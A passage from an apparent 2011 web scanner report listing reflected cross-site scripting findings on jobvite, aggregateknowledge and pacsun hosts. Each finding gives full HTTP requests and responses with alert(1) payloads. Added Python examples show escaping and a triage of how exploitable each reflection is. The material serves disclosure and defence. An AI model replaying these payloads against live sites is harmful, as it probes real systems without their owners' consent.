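The Python example below is added to show what escaping a value for a JavaScript string context has to cover; it is not code from the report or from the sites in 5.2 to 5.6. It uses a constructed script template in the style of the travelguard and jobvite pages and runs the report's own payloads from 5.2 (quote breakout), 5.4 (line feed ending a // comment) and 5.6 (closing the script element) through the raw and the escaped rendering. The check function is a deliberately simple approximation of what the JavaScript lexer and HTML parser would do, not a real parser.

```python
import re

# Escapes for a value placed inside a quoted JavaScript string literal. Each
# entry neutralises one way of leaving the string: the quotes and backslash end
# or alter the literal, CR/LF and U+2028/U+2029 end the line (and with it a //
# comment, as in 5.4), and < > & are hex-escaped so that the HTML parser never
# sees "</script>" or "<!--" inside the script element (as in 5.6).
_JS_STRING_ESCAPES = {
    "\\": "\\\\",
    "'": "\\'",
    '"': '\\"',
    "\r": "\\r",
    "\n": "\\n",
    "\u2028": "\\u2028",
    "\u2029": "\\u2029",
    "<": "\\x3c",
    ">": "\\x3e",
    "&": "\\x26",
}


def js_string_encode(value: str) -> str:
    """Encode a value for use inside a single- or double-quoted JavaScript string."""
    return "".join(_JS_STRING_ESCAPES.get(ch, ch) for ch in value)


# Constructed template modelled on the u3=... string in 5.2 to 5.4 (assumption).
SCRIPT_TEMPLATE = "<script>var u3 = 'tgdirect{0}';</script>"


def render_script_vulnerable(br: str) -> str:
    """The pattern behind 5.2 to 5.6: the parameter is pasted into a string literal."""
    return SCRIPT_TEMPLATE.format(br)


def render_script_fixed(br: str) -> str:
    return SCRIPT_TEMPLATE.format(js_string_encode(br))


def string_literal_intact(script: str) -> bool:
    """True when the literal is still one token: between the opening quote and
    the closing quote there is no unescaped quote, no raw line terminator and
    no '</script', each of which would hand control to attacker-supplied code."""
    match = re.search(r"var u3 = '(.*)';</script>$", script, re.S)
    if match is None:
        return False
    body = match.group(1)
    if re.search(r"(?<!\\)'", body):
        return False
    if any(ch in body for ch in "\r\n\u2028\u2029"):
        return False
    return "</script" not in body.lower()


# Payloads from the report, URL-decoded: 5.2 (quote breakout), 5.4 (line feed
# terminating a // comment) and 5.6 (closing the script element).
REPORT_PAYLOADS = {
    "5.2": "9c35a';alert(1)//bd29db8f83c",
    "5.4": "9c35a';alert(1)//bd29db8f83c7a27f\nalert(1)//47046b6433b",
    "5.6": "70ad5</script><script>alert(1)</script>8c901f57b91",
}


def demo() -> dict:
    """For each payload: (literal intact in vulnerable page, intact in fixed page)."""
    return {
        name: (
            string_literal_intact(render_script_vulnerable(payload)),
            string_literal_intact(render_script_fixed(payload)),
        )
        for name, payload in REPORT_PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Each payload breaks the raw rendering and is contained by the escaped one. The hex escapes for < and > are what make the difference for 5.6: inside a JavaScript string '\x3c/script\x3e' is just the text </script>, but the HTML parser, which runs first and knows nothing about JavaScript strings, no longer finds an end tag.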

Request

GET /CompanyJobs/Careers.aspx?c=qlZ9Vfw8&70ad5</script><script>alert(1)</script>8c901f57b91=1 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xiknzn45ckbuvem4qyncebea; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=1c05d1d2-b665-4a52-bb90-2eb367a590e1; expires=Wed, 15-Jun-2011 10:23:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:23:18 GMT
Content-Length: 40309

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="http://hir
...[SNIP]...
<!--
jvurlargs = '?c=qlZ9Vfw8&70ad5</script><script>alert(1)</script>8c901f57b91=1';
jvurlargsclean = '?c=qlZ9Vfw8&70ad5</script>
...[SNIP]...

5.7. http://html.aggregateknowledge.com/iframe [wid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The value of the wid request parameter is copied into the response body, inside an HTML comment in an error page. The payload 6503c<x%20style%3dx%3aexpression(alert(1))>bcab1aa82a was submitted in the wid parameter (appended to the original value 2). This input was echoed as 6503c<x style=x:expression(alert(1))>bcab1aa82a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document; this technique is specific to older versions of Internet Explorer and does not work in other browsers. Note also that the reflection lands inside the HTML comment (<!--) that opens the 500 error body, so a working payload would first have to close that comment with -->; since the value is echoed without any encoding, that would be expected to succeed, but it has not been demonstrated here.

Request

GET /iframe?wid=26503c<x%20style%3dx%3aexpression(alert(1))>bcab1aa82a&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp&senduuid=0 HTTP/1.1
Host: html.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=801458892474636324; u=5|0AQBbQQcAAAAAAAEAAQEAgA%3D%3D

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:30 GMT
Connection: close


<!--
An Aggregate Knowledge internal error occurred; Unable to service request.
java.lang.IllegalArgumentException: Could not convert "26503c<x style=x:expression(alert(1))>bcab1aa82a" to int / long.
   at net.agkn.module.common.parameter.ParameterDefinition.castSingleValue(ParameterDefinition.java:259)
   at net.agkn.module.common.parameter.ParameterDefinition.castValue(ParameterDefin
...[SNIP]...

5.8. http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/AC_close_052110

Issue detail

The value of REST URL parameter 4 is copied into the response body. The payload 19ce4<img%20src%3da%20onerror%3dalert(1)>61e2893ba50 was submitted in the REST URL parameter 4. This input was echoed as 19ce4<img src=a onerror=alert(1)>61e2893ba50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the response is a 403 served with Content-Type: text/plain, so the injected markup executes only in a browser that sniffs the body as HTML in spite of the declared type (historically Internet Explorer, in the absence of X-Content-Type-Options: nosniff); the severity should be weighed accordingly. Note also that the error response carries Cache-Control: max-age=3600, so a response containing the payload may be cached by intermediaries for an hour.

Request

GET /is/image/pacsun/AC_close_05211019ce4<img%20src%3da%20onerror%3dalert(1)>61e2893ba50?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:48 GMT
Connection: close

Unable to find /pacsun/AC_close_05211019ce4<img src=a onerror=alert(1)>61e2893ba50

5.9. http://images3.pacsun.com/is/image/pacsun/FSO_041911 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/FSO_041911

Issue detail

The value of REST URL parameter 4 is copied into the response body. The payload 7e30b<img%20src%3da%20onerror%3dalert(1)>83e58811a58 was submitted in the REST URL parameter 4. This input was echoed as 7e30b<img src=a onerror=alert(1)>83e58811a58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the response is a 403 served with Content-Type: text/plain, so the injected markup executes only in a browser that sniffs the body as HTML in spite of the declared type.

Request

GET /is/image/pacsun/FSO_0419117e30b<img%20src%3da%20onerror%3dalert(1)>83e58811a58?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 77
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:43 GMT
Connection: close

Unable to find /pacsun/FSO_0419117e30b<img src=a onerror=alert(1)>83e58811a58

5.10. http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo007

Issue detail

The value of REST URL parameter 4 is copied into the response body. The payload d7f10<img%20src%3da%20onerror%3dalert(1)>cc5d87d654f was submitted in the REST URL parameter 4. This input was echoed as d7f10<img src=a onerror=alert(1)>cc5d87d654f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the response is a 403 served with Content-Type: text/plain, so the injected markup executes only in a browser that sniffs the body as HTML in spite of the declared type.

Request

GET /is/image/pacsun/brand_logo007d7f10<img%20src%3da%20onerror%3dalert(1)>cc5d87d654f?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:50 GMT
Connection: close

Unable to find /pacsun/brand_logo007d7f10<img src=a onerror=alert(1)>cc5d87d654f

5.11. http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo014

Issue detail

The value of REST URL parameter 4 is copied into the response body. The payload 810a9<img%20src%3da%20onerror%3dalert(1)>e15f190e572 was submitted in the REST URL parameter 4. This input was echoed as 810a9<img src=a onerror=alert(1)>e15f190e572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the response is a 403 served with Content-Type: text/plain, so the injected markup executes only in a browser that sniffs the body as HTML in spite of the declared type.

Request

GET /is/image/pacsun/brand_logo014810a9<img%20src%3da%20onerror%3dalert(1)>e15f190e572?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:50 GMT
Connection: close

Unable to find /pacsun/brand_logo014810a9<img src=a onerror=alert(1)>e15f190e572

5.12. http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo015

Issue detail

The value of REST URL parameter 4 is copied into the response body. The payload b23f4<img%20src%3da%20onerror%3dalert(1)>e609f813fa0 was submitted in the REST URL parameter 4. This input was echoed as b23f4<img src=a onerror=alert(1)>e609f813fa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the response is a 403 served with Content-Type: text/plain, so the injected markup executes only in a browser that sniffs the body as HTML in spite of the declared type.

Request

GET /is/image/pacsun/brand_logo015b23f4<img%20src%3da%20onerror%3dalert(1)>e609f813fa0?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:52 GMT
Connection: close

Unable to find /pacsun/brand_logo015b23f4<img src=a onerror=alert(1)>e609f813fa0
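Before accepting a scanner's High/Certain rating on a reflection like the one above, a reviewer checks three things: is the marker really in the body unencoded, what media type does the response declare, and is content sniffing disabled. The following Python is an added example, not part of the XSS.CX report or of any PacSun code; the sample response is reconstructed from finding 5.12 above (the 80-byte 403 body), and the hardened response builder shows an assumed shape for the error reply, not the vendor's actual fix.

```python
import html

# Constructed from finding 5.12 on this page: the marker the scanner injected
# and the 403 response it received. Reconstructed, not captured live.
PAYLOAD = "b23f4<img src=a onerror=alert(1)>e609f813fa0"
_BODY = "Unable to find /pacsun/brand_logo015" + PAYLOAD
SAMPLE_RESPONSE = "\r\n".join([
    "HTTP/1.1 403 Forbidden",
    "Server: Apache-Coyote/1.1",
    "Pragma: no-cache",
    "Content-Type: text/plain",
    f"Content-Length: {len(_BODY)}",   # evaluates to 80, as in the report
    "Cache-Control: max-age=3600",
    "Date: Mon, 16 May 2011 01:59:52 GMT",
    "Connection: close",
    "",
    _BODY,
])

HTML_TYPES = {"text/html", "application/xhtml+xml"}


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status, headers, body).
    Header names are lower-cased; a repeated header keeps its last value."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def triage(raw, payload):
    """Classify a reflected marker the way a reviewer would: raw reflection
    in an HTML document is exploitable; raw reflection in a non-HTML type is
    only exploitable if a browser sniffs the body, which nosniff forbids."""
    status, headers, body = parse_response(raw)
    media_type = headers.get("content-type", "").split(";")[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    reflected_raw = payload in body
    reflected_escaped = (not reflected_raw) and html.escape(payload, quote=False) in body

    if not reflected_raw:
        verdict = "not-exploitable"   # absent, or entity-encoded on output
    elif media_type in HTML_TYPES:
        verdict = "exploitable"       # raw markup inside an HTML document
    elif nosniff:
        verdict = "not-exploitable"   # non-HTML type and sniffing disabled
    else:
        verdict = "sniff-dependent"   # only a content-sniffing browser renders it

    return {
        "status": status,
        "media_type": media_type,
        "nosniff": nosniff,
        "reflected_raw": reflected_raw,
        "reflected_escaped": reflected_escaped,
        "verdict": verdict,
    }


def hardened_not_found(path):
    """Rebuild the same error reply so the echoed path cannot be abused:
    entity-encode it, pin the media type and charset, forbid sniffing, and
    stop caches from storing a body that echoes attacker-controlled input.
    (Assumed shape for illustration; not the vendor's implementation.)"""
    body = "Unable to find " + html.escape(path, quote=True)
    return "\r\n".join([
        "HTTP/1.1 403 Forbidden",
        "Content-Type: text/plain; charset=utf-8",
        "X-Content-Type-Options: nosniff",
        "Cache-Control: no-store",
        f"Content-Length: {len(body.encode('utf-8'))}",
        "Connection: close",
        "",
        body,
    ])


if __name__ == "__main__":
    print(triage(SAMPLE_RESPONSE, PAYLOAD))
    print(triage(hardened_not_found("/pacsun/brand_logo015" + PAYLOAD), PAYLOAD))
```

Run against the reconstructed 5.12 response the verdict is "sniff-dependent": the marker is reflected raw, the type is text/plain and nosniff is absent. Flip the Content-Type to text/html and it becomes "exploitable"; add the nosniff header, or encode the path as the hardened builder does, and it drops to "not-exploitable". That is the distinction the scanner's template collapses when it calls every one of these an "HTML document".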

5.13. http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo016

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload ebcce<img%20src%3da%20onerror%3dalert(1)>ff64f941238 was submitted in REST URL parameter 4 and was echoed as ebcce<img src=a onerror=alert(1)>ff64f941238 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/brand_logo016ebcce<img%20src%3da%20onerror%3dalert(1)>ff64f941238?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:10 GMT
Connection: close

Unable to find /pacsun/brand_logo016ebcce<img src=a onerror=alert(1)>ff64f941238

5.14. http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo017

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload a0352<img%20src%3da%20onerror%3dalert(1)>8835400a2e4 was submitted in REST URL parameter 4 and was echoed as a0352<img src=a onerror=alert(1)>8835400a2e4 in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/brand_logo017a0352<img%20src%3da%20onerror%3dalert(1)>8835400a2e4?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:58 GMT
Connection: close

Unable to find /pacsun/brand_logo017a0352<img src=a onerror=alert(1)>8835400a2e4

5.15. http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btnASmallV3

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 9be63<img%20src%3da%20onerror%3dalert(1)>42202058f7c was submitted in REST URL parameter 4 and was echoed as 9be63<img src=a onerror=alert(1)>42202058f7c in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/btnASmallV39be63<img%20src%3da%20onerror%3dalert(1)>42202058f7c?$img_gif$&$txt=GET+PACMAIL&$layer_0_src=PacSunV2%2Fbtn_130x28&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 78
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:56 GMT
Connection: close

Unable to find /pacsun/btnASmallV39be63<img src=a onerror=alert(1)>42202058f7c

5.16. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btn_searchGo_v2

Issue detail

The value of REST URL parameter 4 is copied unencoded into the response body. The payload 5699c<img%20src%3da%20onerror%3dalert(1)>3d73fa1077f was submitted in REST URL parameter 4 and was echoed as 5699c<img src=a onerror=alert(1)>3d73fa1077f in the application's response. The response is a 403 served as text/plain with no X-Content-Type-Options: nosniff header, so the markup executes only in a browser that sniffs the body as HTML; read the High/Certain rating with that caveat.

This proof of concept shows that arbitrary markup reaches the response unencoded; the <img> onerror event handler runs JavaScript once a browser treats the response as HTML.

Request

GET /is/image/pacsun/btn_searchGo_v25699c<img%20src%3da%20onerror%3dalert(1)>3d73fa1077f?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
